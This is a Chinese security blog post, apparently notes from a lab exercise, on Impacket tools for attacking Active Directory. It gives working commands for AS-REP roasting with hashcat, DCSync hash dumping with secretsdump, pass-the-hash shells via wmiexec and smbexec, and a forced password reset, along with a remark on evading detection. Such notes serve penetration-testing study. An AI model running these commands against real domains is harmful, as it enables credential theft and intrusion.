<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="zhangMini"><title>Impacket-tools · Mini's blog</title><meta name="description" content="impacket-GetNPUsersAS-REP Roasting 攻击ASREProast 攻击是一种针对 Kerberos 协议的攻击技术
如果用户账号设置 Dont require Kerberos preauthentication （不需要 kerberos 预身份验证）选项，该功能默认"><meta name="keywords" content="Security, life"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="short icon" href="/images/favicon.png" type="image/x-icon"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><meta name="generator" content="Hexo 6.3.0"></head><body><div class="sidebar animated fadeInDown"><div class="logo-title"><div class="title"><img src="/images/logo@2x.png" style="width:127px;"><h3 title=""><a href="/">Mini's blog</a></h3><div class="description"><p>Nothing lasts forever.</p></div></div></div><ul class="social-links"></ul><div class="footer"><a target="_blank" href="/"><span>Theme by </span></a><a target="_blank" rel="noopener" href="https://www.caicai.me"> CaiCai </a><span>&</span><a target="_blank" rel="noopener" href="https://github.com/Ben02/hexo-theme-Anatole"> Ben</a><div class="by_farbox"><a href="https://hexo.io/zh-cn/" target="_blank">Proudly published with Hexo&#65281;</a></div></div></div><div class="main"><div class="page-top animated fadeInDown"><div class="nav"><li><a href="/">首页</a></li><li><a href="/about">关于</a></li><li><a href="/archives">归档</a></li><li><a href="/tags">tags</a></li></div><div class="information"><div class="back_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li></div><div class="avatar"><img src="/images/favicon.png"></div></div></div><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Impacket-tools</a></h3></div><div class="post-content"><h2 id="impacket-GetNPUsers"><a href="#impacket-GetNPUsers" class="headerlink" title="impacket-GetNPUsers"></a>impacket-GetNPUsers</h2><h3 id="AS-REP-Roasting-攻击"><a href="#AS-REP-Roasting-攻击" class="headerlink" title="AS-REP Roasting 攻击"></a>AS-REP Roasting 攻击</h3><p>ASREProast 攻击是一种针对 Kerberos 协议的攻击技术</p>
<p>如果用户账号设置 <strong>Dont require Kerberos preauthentication</strong> （不需要 kerberos 预身份验证）选项，该功能默认不启用</p>
<p>攻击者就可以使用指定用户发送 AS_REQ 请求，去请求票据</p>
<p>此时域控的响应的 AS_REP 的消息中，不会作任何验证就将 TGT 票据和该用户 HASH 加密的 Session Key 返回</p>
<p>然后，攻击者就可以对获取到的用户 Hash 加密的 Session Key 进行离线破解，破解成功就可以获取明文密码</p>
<ul>
<li>本地系统遍历哪些用户开启了 “不需要预身份验证” 选项</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-ADUser</span> <span class="literal">-Filter</span> <span class="string">&#x27;useraccountcontrol -band 4194304&#x27;</span> <span class="literal">-Properties</span> useraccountcontrol | <span class="built_in">Format-Table</span> name</span><br></pre></td></tr></table></figure>

<h4 id="使用-impacket-GetNPUsers"><a href="#使用-impacket-GetNPUsers" class="headerlink" title="使用 impacket-GetNPUsers"></a>使用 impacket-GetNPUsers</h4><ul>
<li>枚举用户列表获取未设置认证的账号</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/</span><br></pre></td></tr></table></figure>

<ul>
<li>hashcat 进行破解 Kerberos 5 AS-REP etype 23 (18200)</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 18200 --force -a 0 &#x27;$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:5f4042cedcac50fab53fbe2ed069f8bb$92b24440eda0c831a5c184ae655f56e9078be319b726dc41ba2e15cfdcf936383a96e1fc65aa99017dec89ed2f11939cbf430c543ef297c4a857b5d2bfb15a376b9eeb2f7d9e910a844ea43a7969edac7c4fd55c02477378eabc3ef278c07a1261c75e8037e37b1b472111b3ae28fc7132f759ef834ad745e4035187a4569dc712a876ac20421b697e62bb0890a46789aa796709a5a47fd8796b6487e93690102a0a3fc156878e4e508366470dd404bb39476938b05e4a0b5478c3d1431a4b61a49ec15156691a6dcb1bf57710a5859c9c137c69778b1f5f93aca3f8c802bcd93163a15582e4766d35f6b0f4&#x27; rockyou.txt</span><br></pre></td></tr></table></figure>

<h2 id="impacket-secretsdump"><a href="#impacket-secretsdump" class="headerlink" title="impacket-secretsdump"></a>impacket-secretsdump</h2><h3 id="DCSync-攻击"><a href="#DCSync-攻击" class="headerlink" title="DCSync 攻击"></a>DCSync 攻击</h3><p>在域环境中，不同域控之间，每15分钟都会进行一次域数据同步，当 DC1 想从 DC2 获取数据时，会发起一个 GetNCChanges 请求，该请求的数据包括需要同步的数据</p>
<p>DCSync 就是利用这个原理，通过 DRS(Directory Replication Service) 服务的 GetNCChanges 接口向域控发送数据同步请求</p>
<p>DCSync 技术被整合在了 Mimikatz 中，该功能可以模仿一个域控制器，从真实的域控中请求数据，例如用户的哈希。该功能最大的特点是不用登陆域控，即可远程通过域数据同步复制的方式获得域控的数据</p>
<p>默认情况下，只有 Administrators、Domain Controllers 和 Enterprise Domain Admins 组内的用户有权限使用 DCSync，但我们可以对域内普通用户添加 ACL (Access Control List) 实现普通用户也能调用 DCSync 功能</p>
<h4 id="使用-impacket-secretsdump"><a href="#使用-impacket-secretsdump" class="headerlink" title="使用 impacket-secretsdump"></a>使用 impacket-secretsdump</h4><blockquote>
<p>impacket 的 secretdump dcsync 会增加暴露的可能，mimikatz 实现 dcsync 隐蔽性会比稍好些</p>
</blockquote>
<ul>
<li>获取 administrator 用户 Hash</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretsdump domain/&lt;username for DCSync&gt;:password@&lt;dc-ip&gt; -dc-ip &lt;dc-ip&gt; -just-dc-user &lt;username for DCSync&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>获取所有域用户 Hash</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretsdump xiaorang/admin:Passwd@172.22.6.12</span><br></pre></td></tr></table></figure>

<h2 id="wmiexec-amp-smbexec-amp-psexec"><a href="#wmiexec-amp-smbexec-amp-psexec" class="headerlink" title="wmiexec &amp; smbexec &amp; psexec"></a>wmiexec &amp; smbexec &amp; psexec</h2><p>这些工具的主要区别在于它们使用的协议和技术不同</p>
<ul>
<li><strong>psexec</strong>：使用Server Message Block (SMB)协议通信，通过 SMB 可以访问共享文件、打印机、计算机等资源，并执行命令。它可以实现远程命令执行和服务安装等功能，常用于Windows系统的横向渗透，需要目标主机开启445端口</li>
<li><strong>wmiexec</strong>：使用Windows Management Instrumentation (WMI)协议通信，WMI 是一种管理和监控 Windows 系统的标准化技术，可以通过 WMI 执行各种任务，包括远程命令执行、检索系统信息等。它可以用于横向渗透、漏洞利用和信息收集等场景，需要目标主机开启135端口</li>
<li><strong>smbexec</strong>：与 psexec 类似，也使用 SMB 协议通信，但是实现方式不同。它使用 NTLM 认证协议，可以在目标主机上运行任意程序，无需在目标主机上安装服务或运行 exe 文件。它可以用于 Windows 系统的横向渗透、漏洞利用和信息收集等场景，需要目标主机开启445端口</li>
</ul>
<h3 id="PTH-攻击"><a href="#PTH-攻击" class="headerlink" title="PTH 攻击"></a>PTH 攻击</h3><h4 id="使用impacket-wmiexec"><a href="#使用impacket-wmiexec" class="headerlink" title="使用impacket-wmiexec"></a>使用impacket-wmiexec</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains impacket-wmiexec XIAORANG/administrator@172.22.6.25 -hashes :04d93ffd6f5f6e4490e0de23f240a5e9</span><br></pre></td></tr></table></figure>

<h4 id="使用-impacket-smbexec"><a href="#使用-impacket-smbexec" class="headerlink" title="使用 impacket-smbexec"></a>使用 impacket-smbexec</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-smbexec -hashes :2c66200c70475bd322b880f813f34d7a administrator@172.22.8.15</span><br></pre></td></tr></table></figure>

<h2 id="impacket-changepasswd"><a href="#impacket-changepasswd" class="headerlink" title="impacket-changepasswd"></a>impacket-changepasswd</h2><h4 id="使用-impacket-changepasswd-更改用户密码"><a href="#使用-impacket-changepasswd-更改用户密码" class="headerlink" title="使用 impacket-changepasswd 更改用户密码"></a>使用 impacket-changepasswd 更改用户密码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-changepasswd xiaorang.lab/Aldrich:&#x27;Ald@rLMWuy7Z!#&#x27;@172.22.8.15 -newpass &#x27;asd123!&#x27;</span><br></pre></td></tr></table></figure></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2025-02-15</span><i class="fa fa-tag"></i><a class="tag" href="/tags/intranet/" title="intranet">intranet </a></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="javascript:(function(){EN_CLIP_HOST='http://www.evernote.com';try{var%20x=document.createElement('SCRIPT');x.type='text/javascript';x.src=EN_CLIP_HOST+'/public/bookmarkClipper.js?'+(new%20Date().getTime()/100000);document.getElementsByTagName('head')[0].appendChild(x);}catch(e){location.href=EN_CLIP_HOST+'/clip.action?url='+encodeURIComponent(location.href)+'&amp;title='+encodeURIComponent(document.title);}})();" ref="nofollow" target="_blank"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://example.com/2025/02/15/Impacket-tools/,Mini's blog,Impacket-tools,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2025/02/16/Win-Reg/" title="Windows 注册表利用">上一篇</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2025/02/13/PTH/" title="Hash 传递攻击">下一篇</a></li></ul></div></div></div></div></div><script src="/js/jquery.js"></script><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script></body></html>